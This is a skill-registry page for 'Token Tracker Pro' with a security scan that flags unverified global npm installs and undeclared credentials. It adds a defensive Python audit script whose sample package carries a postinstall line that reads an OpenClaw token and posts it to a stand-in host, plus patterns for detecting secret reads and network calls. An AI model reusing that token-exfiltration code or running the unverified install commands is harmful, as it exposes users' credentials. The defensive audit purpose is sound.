Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Token Tracker Pro

v2.2.0

Records and tracks token consumption of OpenClaw sessions, provides daily, weekly and cumulative statistics, and offers suggestions for saving tokens.

0 · 88 · 0 current · 0 all-time
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotal: Benign
OpenClaw: Suspicious (medium confidence)
Purpose & Capability
The skill claims to track OpenClaw session token usage, but its metadata declares no required binaries, no credentials, and no config paths. Practical token tracking would need to read session logs, call an API, or query platform usage metrics, with the corresponding credentials; none of that is declared, so the declared requirements are insufficient for the stated purpose.
Instruction Scope
SKILL.md tells the user/agent to run commands such as 'token-tracker', and to run 'npm install -g clawhub' followed by 'clawhub install token-tracker-pro-2026'. It does not explain where token data is read from, which credentials (if any) are needed, or whether data is sent to external endpoints. The instructions therefore grant broad, vague authority to install and run external tooling without specifying data flows or required permissions.
Install Mechanism
Although the registry entry has no install spec, SKILL.md directs users to install a global npm package ('clawhub') and then use it to install the skill. That means downloading and executing third-party code from npm and from an unknown source. A global npm install modifies the system and can run arbitrary code through the package's lifecycle scripts (preinstall/postinstall), which is a moderate-to-high risk unless the package and install source are verified. No homepage or repository is provided to audit.
Credentials
No environment variables, credentials, or config paths are declared, yet token-tracking functionality would typically require access to account/session metrics or API credentials. The absence of declared secrets is suspicious: either the skill is incomplete, or it would silently request or require credentials at runtime.
Persistence & Privilege
The skill is not marked 'always' and requests no special platform privileges. However, the suggested 'npm install -g' is a global installation that writes to system directories and persists code on disk, which increases risk if the source is untrusted. The skill metadata describes no self-modifying or cross-skill configuration, which is good.
What to consider before installing
This skill's README asks you to install and run third-party CLI code but gives no source repository, no declared binaries, and no explanation of where token data comes from; that mismatch is suspicious. Before installing:
(1) ask the publisher for a homepage or source repository and review the code;
(2) verify what 'clawhub' is and whether it is a known, trusted package;
(3) confirm which credentials or platform permissions the tool needs and where data is stored or sent;
(4) test in a sandbox or isolated environment rather than doing a global npm install;
(5) do not grant secrets until you can audit the code and data flow.
If the publisher cannot provide verifiable source or a justification for the missing credentials/binaries, treat this skill as untrusted.
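One way to act on points (2), (3) and (5) without running anything: fetch the package tarball with `npm pack <pkg>` (which downloads but does not execute lifecycle scripts), extract it, and audit the extracted directory offline. The script below is an added example written for this page; it is not ClawHub's scanner and it has not been run against the real 'clawhub' package. It checks the manifest for missing provenance, install-time lifecycle hooks and linked executables, then sweeps the shipped JavaScript for capabilities the README never mentioned (process spawning, network access, environment/secret reads). The sample package it builds in a temp directory is constructed for illustration only, and the pattern list is a starting point, not an exhaustive one.

```python
"""Offline pre-install audit of an extracted npm package directory.

Added example, not part of the ClawHub page or of any skill it lists.
Usage on a real package:  npm pack <pkg> && tar -xzf <pkg>-<ver>.tgz
then:                     python audit.py package/
The sample package built by build_sample_package() is constructed here purely
to exercise the checks; it is not the real 'clawhub' package.
"""
import json
import os
import re
import sys
import tempfile

# npm runs these automatically during `npm install`, before the CLI is ever invoked.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Illustrative capability patterns; extend for your own threat model.
SUSPICIOUS = {
    "spawns processes": re.compile(r"\b(child_process|execSync|spawnSync|exec\()"),
    "network access": re.compile(r"\b(https?\.request|fetch\(|axios|node-fetch|WebSocket)"),
    "reads environment/secrets": re.compile(r"process\.env\b"),
    "touches home directory": re.compile(r"os\.homedir\(|~/\.|\.ssh\b|\.npmrc\b"),
    "eval / dynamic code": re.compile(r"\beval\(|new Function\("),
}


def audit_package(pkg_dir):
    """Return a list of (severity, finding) tuples for an extracted package."""
    findings = []
    with open(os.path.join(pkg_dir, "package.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)

    # 1. Provenance: with no repository or homepage there is no source to diff the tarball against.
    if not manifest.get("repository") and not manifest.get("homepage"):
        findings.append(("high", "no repository or homepage declared"))

    # 2. Lifecycle scripts execute at install time with the installing user's privileges.
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            findings.append(("high", f"lifecycle script {hook!r} runs on install: {cmd}"))

    # 3. `bin` entries are what a global install links onto PATH; record them.
    bins = manifest.get("bin")
    if isinstance(bins, str):
        bins = {manifest.get("name", "?"): bins}
    for name, path in (bins or {}).items():
        findings.append(("info", f"installs executable {name!r} -> {path}"))

    # 4. Static sweep of shipped JavaScript for undeclared capabilities.
    for root, _dirs, files in os.walk(pkg_dir):
        for fname in files:
            if not fname.endswith((".js", ".mjs", ".cjs")):
                continue
            path = os.path.join(root, fname)
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            rel = os.path.relpath(path, pkg_dir)
            for label, pat in SUSPICIOUS.items():
                if pat.search(src):
                    findings.append(("medium", f"{rel}: {label}"))
    return findings


def build_sample_package(base):
    """Construct a throwaway package tree (hypothetical; for demonstration only)."""
    pkg = os.path.join(base, "package")
    os.makedirs(os.path.join(pkg, "lib"))
    os.makedirs(os.path.join(pkg, "bin"))
    manifest = {
        "name": "example-installer",          # hypothetical package name
        "version": "0.0.1",
        "bin": {"example-installer": "bin/cli.js"},
        "scripts": {"postinstall": "node lib/setup.js"},
        # deliberately no "repository"/"homepage", mirroring the scan finding above
    }
    with open(os.path.join(pkg, "package.json"), "w", encoding="utf-8") as fh:
        json.dump(manifest, fh)
    with open(os.path.join(pkg, "bin", "cli.js"), "w", encoding="utf-8") as fh:
        fh.write("console.log('hello');\n")
    with open(os.path.join(pkg, "lib", "setup.js"), "w", encoding="utf-8") as fh:
        fh.write("const { execSync } = require('child_process');\n"
                 "const token = process.env.OPENCLAW_TOKEN;\n"
                 "fetch('https://example.invalid/report', {method: 'POST', body: token});\n")
    return pkg


def run_demo():
    """Audit the constructed sample package and return its findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_package(build_sample_package(tmp))


if __name__ == "__main__":
    results = audit_package(sys.argv[1]) if len(sys.argv) > 1 else run_demo()
    for severity, text in results:
        print(f"[{severity}] {text}")
```

Any 'high' finding (install-time hook, no source to review) is enough to stop and take the package to a sandbox; a 'medium' hit in a file the README does not account for (here, a postinstall script that reads an environment variable and posts it to a remote host) is exactly the undeclared data flow the scan above warns about.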

Like a lobster shell, security has layers — review code before you run it.

Tags: latest · optimization · pro · productivity · token · tracking
